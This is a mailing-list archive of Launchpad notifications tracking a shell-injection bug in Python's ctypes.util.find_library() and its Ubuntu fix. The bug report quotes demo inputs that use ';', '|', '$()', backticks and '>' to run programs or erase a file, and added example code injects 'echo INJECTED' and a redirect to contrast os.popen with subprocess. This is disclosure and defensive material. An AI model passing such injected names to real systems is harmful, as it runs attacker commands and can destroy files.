[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2018-01-18 Thread Launchpad Bug Tracker
This bug was fixed in the package python2.7 - 2.7.12-1ubuntu0~16.04.3

---
python2.7 (2.7.12-1ubuntu0~16.04.3) xenial-proposed; urgency=medium

  * Some performance improvements: LP: #1638695.
    - Build the _math.o object file without -fPIC for static builds.
  * Rename md5_* functions to _Py_md5_*. Closes: #868366. LP: #1734109.
  * Explicitly use the system python for byte compilation in postinst scripts.
    LP: #1682934.
  * Fix issue #22636: Avoid shell injection problems with
    ctypes.util.find_library(). LP: #1512068.

 -- Matthias Klose   Mon, 04 Dec 2017 15:50:18 +0100

** Changed in: python2.7 (Ubuntu Xenial)
   Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  Fix Released

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$
  are in the name.
  The "os.popen()" calls in the util.py script should be replaced with
  "subprocess.Popen()".

  Demo Exploits for Linux:

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")            # runs xeyes
  >>> find_library("|xterm")            # runs terminal
  >>> find_library("")                  # runs gimp
  >>> find_library("$(nautilus)")       # runs filemanager
  >>> find_library(">test")             # creates, and if exists, erases a file "test"

  Traceback

  >>> find_library("`xmessage hello`")  # shows a message, press ctrl+c for Traceback
  ^CTraceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
      return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
    File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
      trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/python/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
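
The pattern named in the bug description (a library name pasted into a command string that os.popen() hands to the shell) next to the subprocess.Popen() argument-vector form it recommends. This is an added example, not code from the thread or from ctypes; PROBE, probe_via_shell, probe_via_argv, flag_metachars and HOSTILE are hypothetical names, the probe is a harmless stand-in for the external tool, and a POSIX /bin/sh is assumed.

```python
import os
import shlex
import subprocess
import sys

# Stand-in for the external tool that a library lookup would invoke
# (constructed for this example): it prints its first argument, so the
# caller can see exactly what the tool received.
PROBE = [sys.executable, "-c", "import sys; print(sys.argv[1])"]

# The characters the bug description lists as dangerous in a library name.
REPORTED_METACHARS = ";|`<>$"

# Constructed, harmless input: everything after ';' is a second shell command.
HOSTILE = "c; echo INJECTED"


def probe_via_shell(name):
    """Vulnerable pattern: the name becomes part of a string parsed by /bin/sh."""
    cmd = " ".join(shlex.quote(part) for part in PROBE) + " -l" + name
    with os.popen(cmd) as stream:  # os.popen() always goes through the shell
        return stream.read().splitlines()


def probe_via_argv(name):
    """Hardened pattern: argument vector, no shell; the name is one opaque argument."""
    proc = subprocess.Popen(
        PROBE + ["-l" + name],
        stdout=subprocess.PIPE,
        universal_newlines=True,
    )
    out, _ = proc.communicate()
    return out.splitlines()


def flag_metachars(name):
    """Return the reported shell metacharacters present in a name, for logging or review."""
    return sorted(set(name) & set(REPORTED_METACHARS))


if __name__ == "__main__":
    # Shell form: the tool sees only "-lc" and the shell runs the trailing command.
    print("shell:", probe_via_shell(HOSTILE))
    # Argv form: the tool receives the whole string as a single argument.
    print("argv :", probe_via_argv(HOSTILE))
    print("flags:", flag_metachars(HOSTILE))
```

With a plain name such as "c" both functions return the same result; they diverge only when the name contains characters the shell interprets.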


[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2017-12-05 Thread Matthias Klose
exploits don't work anymore in the proposed python2.7 update to xenial.

** Tags removed: verification-needed verification-needed-xenial
** Tags added: verification-done verification-done-xenial

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  Fix Committed



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2017-12-04 Thread Łukasz Zemczak
Hello Bernd, or anyone else affected,

Accepted python2.7 into xenial-proposed. The package will build now and
be available at
https://launchpad.net/ubuntu/+source/python2.7/2.7.12-1ubuntu0~16.04.3
in a few hours, and then in the -proposed repository.

Please help us by testing this new package.  See
https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how
to enable and use -proposed. Your feedback will aid us getting this
update out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug,
mentioning the version of the package you tested and change the tag from
verification-needed-xenial to verification-done-xenial. If it does not
fix the bug for you, please add a comment stating that, and change the
tag to verification-failed-xenial. In either case, details of your
testing will help us make a better decision.

Further information regarding the verification process can be found at
https://wiki.ubuntu.com/QATeam/PerformingSRUVerification .  Thank you in
advance!

** Changed in: python2.7 (Ubuntu Xenial)
   Status: New => Fix Committed

** Tags added: verification-needed verification-needed-xenial

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  Fix Committed



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2017-11-24 Thread Brian Morton
** Changed in: python2.7 (Ubuntu Xenial)
 Assignee: (unassigned) => Brian Morton (rokclimb15)

** Changed in: python2.7 (Ubuntu)
 Assignee: Brian Morton (rokclimb15) => (unassigned)

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  New



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2017-11-23 Thread Matthias Klose
fixed in zesty and newer releases

** Also affects: python2.7 (Ubuntu Xenial)
   Importance: Undecided
   Status: New

** Changed in: python2.7 (Ubuntu)
   Status: Confirmed => Fix Released

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Fix Released
Status in python2.7 source package in Xenial:
  New



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-12-13 Thread Brian Morton
Attached is a debdiff for trusty. If someone could please review and
provide feedback, I'll produce additional ones for precise, xenial,
yakkety, and zesty

** Patch added: "Debdiff of modified upstream patch for trusty"
   
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+attachment/4791357/+files/python2.7_2.7.6-8ubuntu0.4.debdiff

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Confirmed



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-12-13 Thread Brian Morton
** Changed in: python2.7 (Ubuntu)
 Assignee: (unassigned) => Brian Morton (rokclimb15)

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Confirmed



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-08-05 Thread Marc Deslauriers
** Changed in: python2.7 (Ubuntu)
   Status: New => Confirmed

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  Confirmed



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-06-18 Thread Bug Watch Updater
** Changed in: python
   Status: New => Fix Released

Status in Python:
  Fix Released
Status in python2.7 package in Ubuntu:
  New



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-01-06 Thread Bug Watch Updater
** Changed in: python
   Status: Unknown => New

Status in Python:
  New
Status in python2.7 package in Ubuntu:
  New



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2016-01-05 Thread Brian Murray
** Also affects: python via
   http://bugs.python.org/issue22636
   Importance: Unknown
   Status: Unknown

Status in Python:
  Unknown
Status in python2.7 package in Ubuntu:
  New



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-30 Thread Brian Murray
** Changed in: python2.7 (Ubuntu)
   Importance: Undecided => High

Status in python2.7 package in Ubuntu:
  New



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-30 Thread Dimitri John Ledkov
upstream only fixed this in 3.5 which we do carry, but not other release
series.

It's not that "ubuntu didn't pick up the fix", it's the upstream that
didn't apply in all applicable release series.

commented on your bug report.

Status in python2.7 package in Ubuntu:
  New


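The change the bug description asks for, replacing os.popen() with subprocess.Popen(), shown side by side as an added example; it is not code from this thread or from CPython's util.py. The helper names and the stand-in command (the running interpreter echoing its argument back) are assumptions, and the `>injected` name follows the report's `>test` demo.

```python
import os
import shlex
import subprocess
import sys
import tempfile

# Stand-in for the external tool (assumption): echoes its first argument, so the
# example runs anywhere. The code in the report shelled out to system tools.
ECHO_ARG = [sys.executable, "-c", "import sys; print(sys.argv[1])"]


def lookup_with_shell(name, workdir):
    """Pattern the report describes: the name is pasted into a shell command line."""
    tool = " ".join(shlex.quote(a) for a in ECHO_ARG)
    cmd = "cd %s && %s lib%s.so" % (shlex.quote(workdir), tool, name)
    with os.popen(cmd) as pipe:  # /bin/sh parses cmd, metacharacters included
        return pipe.read().strip()


def lookup_with_argv(name, workdir):
    """Requested replacement: subprocess.Popen with an argument list, no shell."""
    proc = subprocess.Popen(ECHO_ARG + ["lib%s.so" % name], cwd=workdir,
                            stdout=subprocess.PIPE, universal_newlines=True)
    out, _ = proc.communicate()
    return out.strip()


def files_created_by(lookup, name):
    """Run lookup in an empty scratch directory; return (output, files left behind)."""
    with tempfile.TemporaryDirectory() as workdir:
        out = lookup(name, workdir)
        return out, sorted(os.listdir(workdir))


if __name__ == "__main__":
    for candidate in ("ssl", ">injected"):  # constructed inputs
        print(repr(candidate))
        print("  shell:", files_created_by(lookup_with_shell, candidate))
        print("  argv: ", files_created_by(lookup_with_argv, candidate))
```

With the shell variant the redirect in the name is honoured and a file appears in the scratch directory; with the argument list the same characters reach the tool as one literal argument.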

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-28 Thread Bernd Dietzel
Seems the bug is already known and fixed since 2014 but has not found its way to 
the Ubuntu repos.
http://bugs.python.org/issue22636


** Information type changed from Private Security to Public Security

** Bug watch added: Python Roundup #22636
   http://bugs.python.org/issue22636



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-28 Thread Ubuntu Foundations Team Bug Bot
The attachment "Patch" seems to be a patch.  If it isn't, please remove
the "patch" flag from the attachment, remove the "patch" tag, and if you
are a member of the ~ubuntu-reviewers, unsubscribe the team.

[This is an automated message performed by a Launchpad user owned by
~brian-murray, for any issues please contact him.]

** Tags added: patch



[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-01 Thread Dimitri John Ledkov
marking as security.

** Information type changed from Public to Private Security
